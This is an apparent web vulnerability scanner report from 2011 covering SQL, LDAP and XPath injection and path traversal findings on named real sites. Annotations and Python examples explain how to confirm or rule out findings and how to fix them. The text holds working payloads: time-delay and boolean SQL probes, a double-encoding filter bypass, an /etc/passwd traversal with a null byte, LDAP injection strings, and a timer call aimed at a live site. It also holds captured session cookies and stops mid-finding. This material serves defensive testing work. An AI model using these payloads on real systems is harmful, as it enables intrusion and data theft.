GET /register HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902%2527%2527; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 2
HTTP/1.1 502 Bad Gateway Content-Type: text/html Expires: Mon, 02 May 2011 14:21:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:21:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107
<html><body><h1>502 Bad Gateway</h1> The server returned an invalid or incomplete response. </body></html>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Here the recorded responses do follow the pattern, but note what the "error" is: Response 1 is a 503 from Varnish (the cache could not fetch from the backend), while the two-quote request reached the backend (backend-server: app135) and got the feed's ordinary 404 as text/xml. A backend that fails on one quote and not on two is consistent with a quoting error in SQL, but also with any other parser choking on the character, and no database error text is visible. Confirm manually with a payload whose effect the database must evaluate before rating this High.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /topic%2527/feed/ HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 1
HTTP/1.1 503 Service Unavailable Server: Varnish Retry-After: 0 Content-Type: text/html; charset=utf-8 Content-Length: 419 X-Varnish: 1026560449 Expires: Mon, 02 May 2011 14:28:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:28:25 GMT Connection: close
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>503 Service Unavailabl ...[SNIP]... <h1>Error 503 Service Unavailable</h1> ...[SNIP]...
Request 2
GET /topic%2527%2527/feed/ HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6 X-Powered-By: PHP/5.1.6 X-Pingback: http://www.glam.com/xmlrpc.php Last-Modified: Mon, 02 May 2011 14:28:31 GMT ETag: "125a6da3d287aa017e47cee5719e8da6" Content-Type: text/xml; charset=UTF-8 backend-server: app135 X-Varnish: 1026561083 Expires: Mon, 02 May 2011 14:28:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:28:31 GMT Content-Length: 942 Connection: close
1.32. http://www.glam.com/topic/feed/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.glam.com
Path:
/topic/feed/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 63192 milliseconds to respond to the request, compared with 172 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Two details argue for re-testing before accepting the "Certain" rating. The payload asks for a 20 second delay (waitfor delay '0:0:20') but the response took about 63 seconds, which is closer to a proxy or backend timeout than to the requested delay; with a genuine WAITFOR the response time tracks the delay when it is varied (for example 5, 10 and 20 seconds). The database inference also rests only on the payload dialect: this host's other responses in the report identify Apache with PHP/5.1.6 and an xmlrpc.php pingback endpoint behind Varnish, a stack more commonly backed by MySQL, where WAITFOR is not valid syntax.
Request
GET /topic/feed/?1',0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
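The check described above, as an added example (not part of the scanner report): a time-based result is only credible if the elapsed time scales with the delay requested. The two targets are constructed stand-ins on a fake clock, one that honours WAITFOR and one that hangs on any quote until a proxy cuts it off after about 63 seconds; http_timer() builds a real sender from a URL template and is not exercised offline.

```python
"""Confirming a time-based SQL injection result by scaling the delay."""
import re
import time
import urllib.parse
import urllib.request
from typing import Callable, Sequence


def waitfor_payload(seconds: int) -> str:
    """The MS SQL Server dialect the scanner used: ',0)waitfor delay'0:0:20'--"""
    return f"',0)waitfor delay'0:0:{seconds}'--"


def confirm_time_based(send: Callable[[str], float], benign: str = "1",
                       delays: Sequence[int] = (5, 10, 20),
                       slack: float = 1.5) -> bool:
    """True only if each requested delay adds roughly that many seconds on
    top of the benign request time.  A fixed timeout (63 s whether we ask
    for 5 s or 20 s) fails, and so does a server that ignores the payload."""
    baseline = send(benign)
    for d in delays:
        added = send(waitfor_payload(d)) - baseline
        if abs(added - d) > slack:
            return False
    return True


class HonouringTarget:
    """Constructed: a backend that really executes WAITFOR, on a fake clock."""
    def __init__(self, latency: float = 0.172):
        self.latency = latency

    def send(self, value: str) -> float:
        m = re.search(r"waitfor delay'0:0:(\d+)'", value)
        return self.latency + (int(m.group(1)) if m else 0)


class TimeoutTarget:
    """Constructed: a backend that hangs on any quote until a proxy gives
    up after ~63 s, whatever delay the payload asked for."""
    def send(self, value: str) -> float:
        return 63.192 if "'" in value else 0.172


def http_timer(url_template: str, timeout: float = 120) -> Callable[[str], float]:
    """Real sender.  url_template contains '{}' where the value goes (it
    may be in the parameter name, as in the finding above)."""
    def send(value: str) -> float:
        url = url_template.format(urllib.parse.quote(value, safe=""))
        start = time.perf_counter()
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                resp.read()
        except Exception:
            pass  # a timeout or error response still has an elapsed time
        return time.perf_counter() - start
    return send


if __name__ == "__main__":
    print("honouring target:", confirm_time_based(HonouringTarget().send))
    print("timeout target:  ", confirm_time_based(TimeoutTarget().send))
```

Against a live target, pass http_timer("http://www.glam.com/topic/feed/?{}=1") as send; keep the delays short enough that the proxy in front of the application does not time out first, or the check cannot tell a real delay from a hang.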
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 13880390%20or%201%3d1--%20 and 13880390%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
1.34. http://www.wiseshop.com/shop.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.wiseshop.com
Path:
/shop.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
In this instance the two responses differ only in the reviewer locations ("from Springfield, IL" against "from Hastings, NE", and so on down the page) and by 12 bytes of Content-Length; the review text is identical. The locations evidently change from request to request, so the difference is per-request noise, not the effect of 1=1 versus 1=2, and the payload sits in a parameter name (with value 1) that the application has no reason to read. This is the false positive the note above warns about; fetching the unmodified page twice should show the same variation.
Request 1
GET /shop.php?1%20and%201%3d1--%20=1 HTTP/1.1 Host: www.wiseshop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=a211571b9df89ace6097499eec2d130de55f084c-954372b780745a3c3e66ad3e1a8a46e46c5b08f3; PHPSESSID=i2htret7k8ivj3snodk9ebjrp2; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl;
Response 1
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.wiseshop.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 May 2011 15:05:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 15:05:49 GMT Content-Length: 24249 Connection: close Set-Cookie: uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl; expires=Sun, 02-May-2021 05:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="4777db28467cd55a311f ...[SNIP]... <span class="post">from Springfield, IL</span></span> <span class="child_body">After having several Linksys routers go bad after a month or two of usage, I discovered this Netgear router. I've had it over a year, and I haven't had a problem yet. </span> </div></li><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Nicole</span><span class="post">from New York, NY</span></span> <span class="child_body">Netgear offers the best wireless routers out there, and they're extremely reliable. Prices vary greatly depending on which kind would satisfy your needs so chose carefully.</span> </div></li><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Jennifer</span><span class="post">from Beaver, WV</span></span> <span class="child_body">The Linksys WRT54G router is a good, low cost router for home use.</span> </div></li></ul></li><li><div class="node_title"></div><div class="node_head"></div><div class="node_body">Are there any companies that specialize in acoustic research? 
I am trying to build a home theater room and need help getting the acoustic properties of the room correct.</div><a rel="facebox" href="/solo?module=facebook/login&message_num=4" class="more_link">Reply</a><div class='author_name'><span><span class="question">Question</span></span>Shelby H.<span class='post'>from Dover, DE</span></div><ul class="node_children"><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Kira</span><span class="post">from Pinedale, WY</span></span> <span class="child_body">I use these -- with a name like "acoustic research" I figure that they already did the work for me!</span> <div class="recommended_product"> <img src='http://img.bizrate.com/resize?sq=80&uid=1848571785'/></div><div class='recommendation'><div class='author'>Kira's recommendation:</div><div class='title'>Acoustic Research AW880 Portable Wireless Indoor Stereo Sp ...[SNIP]...
Request 2
GET /shop.php?1%20and%201%3d2--%20=1 HTTP/1.1 Host: www.wiseshop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=a211571b9df89ace6097499eec2d130de55f084c-954372b780745a3c3e66ad3e1a8a46e46c5b08f3; PHPSESSID=i2htret7k8ivj3snodk9ebjrp2; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl;
Response 2
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.wiseshop.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 May 2011 15:05:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 15:05:49 GMT Content-Length: 24237 Connection: close Set-Cookie: uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl; expires=Sun, 02-May-2021 05:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="4777db28467cd55a311f ...[SNIP]... <span class="post">from Hastings, NE</span></span> <span class="child_body">After having several Linksys routers go bad after a month or two of usage, I discovered this Netgear router. I've had it over a year, and I haven't had a problem yet. </span> </div></li><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Nicole</span><span class="post">from Logan, UT</span></span> <span class="child_body">Netgear offers the best wireless routers out there, and they're extremely reliable. Prices vary greatly depending on which kind would satisfy your needs so chose carefully.</span> </div></li><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Jennifer</span><span class="post">from Davenport, IA</span></span> <span class="child_body">The Linksys WRT54G router is a good, low cost router for home use.</span> </div></li></ul></li><li><div class="node_title"></div><div class="node_head"></div><div class="node_body">Are there any companies that specialize in acoustic research? 
I am trying to build a home theater room and need help getting the acoustic properties of the room correct.</div><a rel="facebox" href="/solo?module=facebook/login&message_num=4" class="more_link">Reply</a><div class='author_name'><span><span class="question">Question</span></span>Shelby H.<span class='post'>from Dover, DE</span></div><ul class="node_children"><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Kira</span><span class="post">from Newport, RI</span></span> <span class="child_body">I use these -- with a name like "acoustic research" I figure that they already did the work for me!</span> <div class="recommended_product"> <img src='http://img.bizrate.com/resize?sq=80&uid=1848571785'/></div><div class='recommendation'><div class='author'>Kira's recommendation:</div><div class='title'>Acoustic Research AW880 Portable Wireless Indoor Stereo Speake ...[SNIP]...
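The difference-based test behind this finding and the menu-parameter one before it, as an added example (not the scanner's code and not code from any site listed here): fetch the baseline twice to measure how much the page changes on its own, and flag only when the 1=2 probe moves the page further than that noise. Two constructed targets stand in for a web application: one renders the same page every time except for a rotating "from City, ST" string, which is the only difference visible between the two wiseshop.com responses above, and one concatenates the parameter into SQL against a throwaway SQLite database.

```python
"""Difference-based SQL injection check with a noise baseline."""
import difflib
import itertools
import re
import sqlite3
from dataclasses import dataclass
from typing import Callable

TRUE_PAYLOAD = " and 1=1-- "    # decoded %20and%201%3d1--%20
FALSE_PAYLOAD = " and 1=2-- "   # decoded %20and%201%3d2--%20

# Constructed per-request noise, modelled on the wiseshop.com responses:
# each review is stamped with the next city from a cycle of seven, so two
# consecutive renders never show the same city in the same slot.
_CITIES = itertools.cycle(["Springfield, IL", "Hastings, NE", "New York, NY",
                           "Logan, UT", "Beaver, WV", "Davenport, IA", "Dover, DE"])
_REVIEWS = [("Nicole", "Netgear offers the best wireless routers out there."),
            ("Jennifer", "The Linksys WRT54G router is a good, low cost router."),
            ("Kira", "I use these and have had no problems so far.")]


def render(rows) -> str:
    """Render (name, body) rows as HTML; the city differs on every call."""
    items = "".join(
        f'<li><span class="name">{name}</span>'
        f'<span class="post">from {next(_CITIES)}</span>'
        f'<span class="body">{body}</span></li>'
        for name, body in rows)
    tail = "" if rows else "<p>No reviews found.</p>"
    return f"<html><body><h1>Reviews</h1><ul>{items}</ul>{tail}</body></html>"


def make_db() -> sqlite3.Connection:
    """Throwaway SQLite table standing in for the application database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE reviews (id INTEGER PRIMARY KEY, product INTEGER,"
                " name TEXT, body TEXT)")
    con.executemany("INSERT INTO reviews (product, name, body) VALUES (1, ?, ?)",
                    _REVIEWS)
    return con


def vulnerable_target(con) -> Callable[[str], str]:
    """Handler that splices the request value into the statement (BAD)."""
    def fetch(product: str) -> str:
        sql = f"SELECT name, body FROM reviews WHERE product = {product} ORDER BY id"
        return render(con.execute(sql).fetchall())
    return fetch


def parameterized_target(con) -> Callable[[str], str]:
    """Same page with a bound parameter: the payload is compared as data."""
    def fetch(product: str) -> str:
        sql = "SELECT name, body FROM reviews WHERE product = ? ORDER BY id"
        return render(con.execute(sql, (product,)).fetchall())
    return fetch


def noisy_static_target(product: str) -> str:
    """Ignores its input entirely; only the rotating city changes."""
    return render(_REVIEWS)


def segments(html: str) -> list:
    """Split markup into tags and text nodes so one changed phrase is one
    changed token rather than a change to the whole page."""
    return re.findall(r"<[^>]*>|[^<]+", html)


def similarity(a: str, b: str) -> float:
    return difflib.SequenceMatcher(None, segments(a), segments(b),
                                   autojunk=False).ratio()


@dataclass
class Verdict:
    likely: bool
    noise_floor: float      # similarity of two identical requests
    true_vs_base: float
    false_vs_base: float
    true_vs_false: float


def boolean_sqli_check(fetch: Callable[[str], str], base: str,
                       margin: float = 0.05) -> Verdict:
    """Flag only when the FALSE payload moves the page further from the
    baseline than two identical requests already move it, while the TRUE
    payload stays inside that noise band."""
    b1, b2 = fetch(base), fetch(base)
    floor = similarity(b1, b2)
    t, f = fetch(base + TRUE_PAYLOAD), fetch(base + FALSE_PAYLOAD)
    tb, fb, tf = similarity(t, b1), similarity(f, b1), similarity(t, f)
    likely = tb >= floor - margin and fb < floor - margin and tf < floor - margin
    return Verdict(likely, floor, tb, fb, tf)


if __name__ == "__main__":
    con = make_db()
    for label, target in [("concatenated SQL", vulnerable_target(con)),
                          ("bound parameter", parameterized_target(con)),
                          ("static page, rotating city", noisy_static_target)]:
        print(f"{label}: {boolean_sqli_check(target, '1')}")
```

The same comparison applies when the payload is placed in a parameter name rather than a value; only the fetch function changes. The noise floor is what the scanner's difference test lacks: without it, any page with rotating content produces a "different response" for every probe.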
The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The disclosed fragment is informative. The error text starts at \' AND saved = 'n' ORDER BY search_date DESC LIMIT 1, so the cookie value was backslash-escaped (the \') and still broke the statement, which is what happens when an escaped value is spliced in without surrounding quotes, for example into a numeric comparison. Escaping therefore does not protect this query; it needs a bound parameter. The verbose MySQL error is itself an information leak (query structure, column names, the ORDER BY and LIMIT clauses) and should be replaced by a generic error page.
body { background-color: #fff; margin: 40px; font-family: Lucida Grande, Verdana, Sans-serif; font-size: 12px; color: #000 ...[SNIP]... <p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p> ...[SNIP]...
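What the escaped-but-unquoted pattern behind that error looks like, and the fix, as an added example (not from the report or from the application that produced the MySQL error). SQLite stands in for MySQL and reports the same break as "unrecognized token" rather than "You have an error in your SQL syntax"; the query shape and the column names come from the disclosed fragment, while the table layout and rows are constructed.

```python
"""Escaping is not a fix when the value is spliced in unquoted."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed search_history table; only the column names are from
    the disclosed query fragment."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE search_history (search_id INTEGER, member_id INTEGER,"
                " saved TEXT, search_date INTEGER, query TEXT)")
    con.executemany("INSERT INTO search_history VALUES (?, ?, ?, ?, ?)", [
        (42, 7, "n", 1304359345, "netgear router"),
        (43, 8, "n", 1304359400, "acoustic research"),
        (44, 7, "y", 1304359500, "home theater"),
    ])
    return con


def mysql_style_escape(value: str) -> str:
    """What addslashes()/mysql_real_escape_string() do to a quote."""
    return (value.replace("\\", "\\\\").replace("'", "\\'")
                 .replace('"', '\\"').replace("\x00", "\\0"))


def last_search_vulnerable(con, search_id: str):
    # BAD: escaped, but unquoted.  A lone quote breaks the statement (the
    # disclosed error) and "0 OR 1=1" passes through untouched.
    sql = ("SELECT search_id, query FROM search_history"
           f" WHERE search_id = {mysql_style_escape(search_id)}"
           " AND saved = 'n' ORDER BY search_date DESC LIMIT 1")
    return con.execute(sql).fetchone()


def last_search_safe(con, search_id: str):
    # Bound parameter: the value is data whatever it contains.  With the
    # INTEGER affinity of search_id, "0 OR 1=1" simply matches nothing.
    sql = ("SELECT search_id, query FROM search_history"
           " WHERE search_id = ? AND saved = 'n'"
           " ORDER BY search_date DESC LIMIT 1")
    return con.execute(sql, (search_id,)).fetchone()


def probe(lookup, con, value: str) -> str:
    """Summarise a lookup as 'error', 'row' or 'none'."""
    try:
        row = lookup(con, value)
    except sqlite3.OperationalError:
        return "error"
    return "row" if row else "none"


if __name__ == "__main__":
    con = make_db()
    for value in ("42", "'", "0 OR 1=1"):
        print(f"{value!r:12} vulnerable={probe(last_search_vulnerable, con, value):5} "
              f"safe={probe(last_search_safe, con, value)}")
```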
The mName parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
The payload viewAdJs../../../../../../../../etc/passwd%00viewAdJs was submitted in the mName parameter. The requested file was returned in the application's response. The shape of the payload is the point: the expected value (viewAdJs) is kept at both ends, the traversal sequence sits between them, and a URL-encoded null byte (%00) ends the name before the trailing token, so a check that the value starts and ends with viewAdJs passes while the file API stops reading at the null byte. A fix has to canonicalise the path and confirm it stays inside the intended directory; checking for the expected prefix and suffix is not enough.
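The two checks side by side, as an added example (not from the report or from the application it describes): a prefix/suffix test of the kind the payload above is built to defeat, and a containment check that rejects it. The payload is the one from the finding, decoded; the base directory is a throwaway temp directory.

```python
"""Resolving a request-supplied file name: a check that fails and one that holds."""
import os
import tempfile
from urllib.parse import unquote

EXPECTED = "viewAdJs"
PAYLOAD = unquote("viewAdJs../../../../../../../../etc/passwd%00viewAdJs")


def make_base() -> str:
    """A throwaway directory standing in for the application's file root."""
    return tempfile.mkdtemp(prefix="ads-")


def naive_resolve(base: str, name: str) -> str:
    """Prefix/suffix validation, then a C-style open that stops at NUL."""
    if not (name.startswith(EXPECTED) and name.endswith(EXPECTED)):
        raise PermissionError("unexpected file name")
    effective = name.split("\x00", 1)[0]        # what open(2) would see
    return os.path.normpath(os.path.join(base, effective))


def safe_resolve(base: str, name: str) -> str:
    """Reject NUL outright, canonicalise, and require the result to stay
    inside the base directory (an absolute name fails this test too)."""
    if "\x00" in name:
        raise ValueError("NUL byte in file name")
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, name))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PermissionError("path escapes base directory")
    return candidate


def escapes_base(resolver, base: str, name: str) -> bool:
    """True if the resolver hands back a path outside base; a rejected
    name counts as not escaping."""
    try:
        resolved = resolver(base, name)
    except (ValueError, PermissionError):
        return False
    base_real = os.path.realpath(base)
    return os.path.commonpath([base_real, os.path.realpath(resolved)]) != base_real


if __name__ == "__main__":
    base = make_base()
    print("naive resolves payload to:", naive_resolve(base, PAYLOAD))
    for name in (PAYLOAD, EXPECTED, "/etc/passwd", "../" + EXPECTED):
        print(f"{name!r}: naive escapes={escapes_base(naive_resolve, base, name)}"
              f" safe escapes={escapes_base(safe_resolve, base, name)}")
```

The NUL check matters even though realpath would keep the traversal inside base: Python strings carry the NUL through to the OS call, which raises ValueError ("embedded null byte") rather than silently truncating, and rejecting it early keeps the behaviour the same on every platform.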
The pid parameter appears to be vulnerable to LDAP injection attacks.
The payloads 9cedc10e48d229ef)(sn=* and 9cedc10e48d229ef)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
The ci parameter appears to be vulnerable to LDAP injection attacks.
The payloads 8c2b229d97e563c0)(sn=* and 8c2b229d97e563c0)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
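How the two probes above tell a parser that a value reaches the filter, and the escaping that makes them inert, as an added example (not from the report or from the application behind the pid and ci parameters). The filter shape is an assumption: a lookup inside an OR group, the "disjunctive" context the scanner infers from ")(" producing a well-formed filter while ")!(" does not. The parser is a deliberately small reading of RFC 4515 (no extensible match, a value runs to the closing parenthesis).

```python
"""Escaping a value before it goes into an LDAP search filter."""
# RFC 4515 section 3: these must be hex-escaped inside an assertion value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def filter_vulnerable(pid: str) -> str:
    # BAD: the value is pasted in; ")(sn=*" adds terms to the OR group.
    return f"(|(pid={pid})(legacyId={pid}))"


def filter_safe(pid: str) -> str:
    e = escape_filter_value(pid)
    return f"(|(pid={e})(legacyId={e}))"


def parse_filter(text: str):
    """Parse a filter into nested tuples; ValueError on malformed input."""
    end, node = _parse(text, 0)
    if end != len(text):
        raise ValueError(f"trailing data at {end}")
    return node


def _parse(s: str, i: int):
    if i >= len(s) or s[i] != "(":
        raise ValueError(f"expected '(' at {i}")
    i += 1
    if i >= len(s):
        raise ValueError("unexpected end of filter")
    if s[i] in "&|":
        op, items, i = s[i], [], i + 1
        while i < len(s) and s[i] == "(":
            i, sub = _parse(s, i)
            items.append(sub)
        if not items:
            raise ValueError("empty filter list")
        node = (op, items)
    elif s[i] == "!":
        i, sub = _parse(s, i + 1)
        node = ("!", [sub])
    else:
        eq, close = s.find("=", i), s.find(")", i)
        if eq < 0 or close < 0 or eq > close:
            raise ValueError(f"malformed item at {i}")
        value = s[eq + 1:close]
        if "(" in value:
            raise ValueError("unescaped '(' in value")
        node = ("=", s[i:eq], value)
        i = close
    if i >= len(s) or s[i] != ")":
        raise ValueError(f"expected ')' at {i}")
    return i + 1, node


def is_well_formed(ldap_filter: str) -> bool:
    try:
        parse_filter(ldap_filter)
    except ValueError:
        return False
    return True


def term_count(ldap_filter: str) -> int:
    """Number of terms in the outer group (1 for a bare item)."""
    node = parse_filter(ldap_filter)
    return len(node[1]) if node[0] in "&|" else 1


if __name__ == "__main__":
    for probe in ("9cedc10e48d229ef)(sn=*", "9cedc10e48d229ef)!(sn=*"):
        v, s = filter_vulnerable(probe), filter_safe(probe)
        print(f"{probe}: vulnerable well-formed={is_well_formed(v)} safe terms={term_count(s)}")
```

The ")(" probe yields a valid filter with two extra terms, the ")!(" probe yields an invalid one; a server that answers those two differently is parsing attacker-controlled filter syntax, which is exactly the signal the scanner keys on. After escaping, both probes are ordinary two-term filters.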
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application appears to be using the ASP.NET XPath APIs.
Request
